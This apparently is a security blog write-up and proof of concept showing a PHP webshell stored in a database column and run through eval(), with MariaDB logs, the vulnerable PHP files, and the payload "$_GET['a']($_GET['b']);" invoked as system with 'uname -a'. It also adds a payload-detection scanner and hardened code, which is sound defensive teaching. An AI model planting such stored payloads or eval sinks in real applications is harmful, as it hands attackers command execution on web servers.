PHP variable functions, reference: https://demonteam.org/2018/07/18/php/
This PoC started from a simple question: if webshell code is stored in the database, can it be executed?
The idea is to plant webshell code in the DB (for example through SQL injection) and then have the application run it for you.
root@tkpark-VirtualBox:/var/www/html# mysql -u root -p
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 43
Server version: 10.1.34-MariaDB-0ubuntu0.18.04.1 Ubuntu 18.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> create user 'iesay'@'%' identified by '1234';
Query OK, 0 rows affected (0.00 sec)

MariaDB [(none)]> grant all on iesay.* to 'iesay'@'%';
Query OK, 0 rows affected (0.00 sec)

MariaDB [(none)]> flush privileges;
Query OK, 0 rows affected (0.00 sec)

MariaDB [(none)]> use iesay
Database changed
MariaDB [iesay]> create table users (
    -> idx int not null auto_increment primary key,
    -> id char(20),
    -> name varchar(100),
    -> pw char(20)
    -> );
Query OK, 0 rows affected (0.02 sec)

MariaDB [iesay]> show tables;
+-----------------+
| Tables_in_iesay |
+-----------------+
| users           |
+-----------------+

MariaDB [iesay]> desc users;
+-------+--------------+------+-----+---------+----------------+
| Field | Type         | Null | Key | Default | Extra          |
+-------+--------------+------+-----+---------+----------------+
| idx   | int(11)      | NO   | PRI | NULL    | auto_increment |
| id    | char(20)     | YES  |     | NULL    |                |
| name  | varchar(100) | YES  |     | NULL    |                |
| pw    | char(20)     | YES  |     | NULL    |                |
+-------+--------------+------+-----+---------+----------------+
4 rows in set (0.00 sec)

MariaDB [iesay]> insert into users(id, name, pw) values('admin', '관리자', 'toor');
Query OK, 1 row affected (0.00 sec)

MariaDB [iesay]> select * from users;
+-----+-------+-----------+------+
| idx | id    | name      | pw   |
+-----+-------+-----------+------+
|   1 | admin | 관리자    | toor |
+-----+-------+-----------+------+
1 row in set (0.00 sec)
apt-get install php7.0-mysql
After installing it, confirm in phpinfo() that the MySQL driver (PDO_MySQL and mysqli, which is what the scripts below use) is loaded.
MariaDB [iesay]> update users set name = "system(ls);" where id="admin";
Query OK, 1 row affected (0.00 sec)
Rows matched: 1  Changed: 1  Warnings: 0

MariaDB [iesay]> select * from users;
+-----+-------+-------------+------+
| idx | id    | name        | pw   |
+-----+-------+-------------+------+
|   1 | admin | system(ls); | toor |
+-----+-------+-------------+------+
1 row in set (0.00 sec)
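Once a payload like this sits in a text column, the only thing between it and execution is some code path that evaluates the column. A quick way to check whether a database already carries such strings is to scan the text columns for patterns that rarely occur in legitimate profile data. The script below is an added example and not part of the original post; the rows are constructed sample data standing in for `select idx, id, name from users`, and the pattern list is an assumption (a starting point, not a complete signature set). Feed it a real mysqli or PDO result set to run it against the iesay database.

```php
<?php
// Added example (not from the original post): flag DB values that look like
// PHP code planted for a later eval() or variable-function call.
declare(strict_types=1);

// Assumed indicator patterns: superglobal reads, code-execution functions,
// variable-function calls ($name(...)), PHP open tags and common obfuscation.
const PAYLOAD_PATTERNS = [
    '/\$_(GET|POST|REQUEST|COOKIE|SERVER)\b/',
    '/\b(eval|assert|system|exec|shell_exec|passthru|popen|proc_open|create_function)\s*\(/i',
    '/\$[A-Za-z_]\w*\s*\(/',
    '/<\?(php|=)/i',
    '/\b(base64_decode|gzinflate|str_rot13)\s*\(/i',
];

function looks_like_php_payload(string $value): bool
{
    foreach (PAYLOAD_PATTERNS as $pattern) {
        if (preg_match($pattern, $value) === 1) {
            return true;
        }
    }
    return false;
}

// Returns one hit per (row, column) whose value matches a payload pattern.
function find_suspicious_rows(array $rows, array $columns): array
{
    $hits = [];
    foreach ($rows as $row) {
        foreach ($columns as $col) {
            if (isset($row[$col]) && looks_like_php_payload((string) $row[$col])) {
                $hits[] = ['idx' => $row['idx'], 'column' => $col, 'value' => $row[$col]];
            }
        }
    }
    return $hits;
}

// Constructed sample rows (not real data); rows 1 and 3 carry the post's payloads.
$rows = [
    ['idx' => 1, 'id' => 'admin', 'name' => "\$_GET['a'](\$_GET['b']);", 'pw' => 'toor'],
    ['idx' => 2, 'id' => 'alice', 'name' => 'Alice Kim',                'pw' => 'x'],
    ['idx' => 3, 'id' => 'bob',   'name' => 'system(ls);',              'pw' => 'y'],
    ['idx' => 4, 'id' => 'carol', 'name' => "O'Brien (sales)",          'pw' => 'z'],
];

foreach (find_suspicious_rows($rows, ['id', 'name']) as $hit) {
    printf("idx=%d column=%s value=%s\n", $hit['idx'], $hit['column'], $hit['value']);
}
```

Only rows 1 and 3 are reported; the apostrophe and parentheses in row 4 do not match because no function name or `$` precedes them. Expect some false positives on free-text columns and treat the output as a lead to review, not as a verdict.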
1.php

<?php
session_start();          // session
include("connect.php");   // DB connection; expected to define $con (mysqli link)

$query  = "select * from users where id='admin' and pw='toor'";
$result = mysqli_query($con, $query);
$row    = mysqli_fetch_array($result);

$a = $row['name'];        // the name column, which 2.php hands to eval()
?>
2.php

<html>
<body>
<h1>Welcome to my home page!</h1>
<p>Some text.</p>
<p>Some more text.</p>
<?php
include '1.php';
eval($a);   // runs whatever string is stored in users.name
?>
</body>
</html>
That is a webshell built on eval(): whatever is in the name column runs as PHP, so the "data" in the DB is now code. One caveat on the payload itself: in `system(ls);` the bare `ls` is an undefined constant. PHP 7 emits a warning and falls back to the string "ls", so the command still runs; PHP 8 throws an Error instead, so there it has to be written as `system("ls");`.
MariaDB [iesay]> update users set name = "$_GET['a']($_GET['b']);" where id="admin";
Query OK, 1 row affected (0.01 sec)
Rows matched: 1  Changed: 1  Warnings: 0

MariaDB [iesay]> select * from users;
+-----+-------+-------------------------+------+
| idx | id    | name                    | pw   |
+-----+-------+-------------------------+------+
|   1 | admin | $_GET['a']($_GET['b']); | toor |
+-----+-------+-------------------------+------+
1 row in set (0.00 sec)
http://192.168.0.118/2.php?a=system&b=uname%20-a

Variable functions work as well: `$_GET['a']($_GET['b'])` calls the function named by parameter `a` with parameter `b` as its argument, so the request above ends up as `system("uname -a")`. Nothing in the stored string names a command, which makes it far less obvious in a database dump than a literal `system(...)` call.
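The defensive side of the same picture, as an added example rather than code from the original post: the two sinks 1.php and 2.php rely on (eval() on a DB column, and a variable-function call built from $_GET) next to a version that treats DB content and request parameters strictly as data. The users table and `$con` from connect.php are the post's; `fetch_user()` additionally assumes the pw column holds a password_hash() value, which the post's schema does not.

```php
<?php
// Added example, not from the original post: the post's sinks beside a
// hardened version. Only the users table and $con are taken from the post.
declare(strict_types=1);

/* ---- vulnerable: what 1.php + 2.php do ---- */

// The DB column becomes code. With name = "$_GET['a']($_GET['b']);" a
// request ?a=system&b=id runs `id` on the web server.
function render_vulnerable(array $row)
{
    eval($row['name']);
}

// The same without eval(): a PHP variable function. When $fn comes from the
// request, any function loaded in this process can be called by name.
function dispatch_vulnerable(string $fn, string $arg)
{
    $fn($arg);
}

/* ---- hardened ---- */

// Login: a prepared statement instead of a concatenated query, and the
// password checked against a hash rather than a plaintext pw column.
// Returns the row array, or null on a bad id/password.
function fetch_user(mysqli $con, string $id, string $password)
{
    $stmt = $con->prepare('SELECT idx, id, name, pw FROM users WHERE id = ?');
    $stmt->bind_param('s', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();   // get_result() needs mysqlnd
    $stmt->close();
    if ($row === null || !password_verify($password, $row['pw'])) {
        return null;
    }
    return $row;
}

// Output: name is displayed as escaped text and never evaluated.
function render_safe(array $row): string
{
    return '<h1>Welcome, ' . htmlspecialchars($row['name'], ENT_QUOTES, 'UTF-8') . '</h1>';
}

// Dispatch: a fixed allowlist maps request values to closures, so the
// request never supplies a function name.
function dispatch_safe(string $action, string $arg): string
{
    $actions = [
        'greet' => static function (string $who): string {
            return 'hello ' . htmlspecialchars($who, ENT_QUOTES, 'UTF-8');
        },
        'len' => static function (string $s): string {
            return (string) strlen($s);
        },
    ];
    if (!array_key_exists($action, $actions)) {
        return 'unknown action';
    }
    return $actions[$action]($arg);
}

// Demo with a constructed row, no database required.
$row = ['idx' => 1, 'id' => 'admin', 'name' => "\$_GET['a'](\$_GET['b']);", 'pw' => 'toor'];
echo render_safe($row), "\n";             // shows the payload as text instead of running it
echo dispatch_safe('greet', 'admin'), "\n";
echo dispatch_safe('system', 'id'), "\n"; // "unknown action": not in the allowlist
```

The allowlist is the important part: a check such as `function_exists($fn)` would still let `system` through, and a denylist of dangerous names is always one alias short. The request should pick an entry from a map the code owns, never a function name.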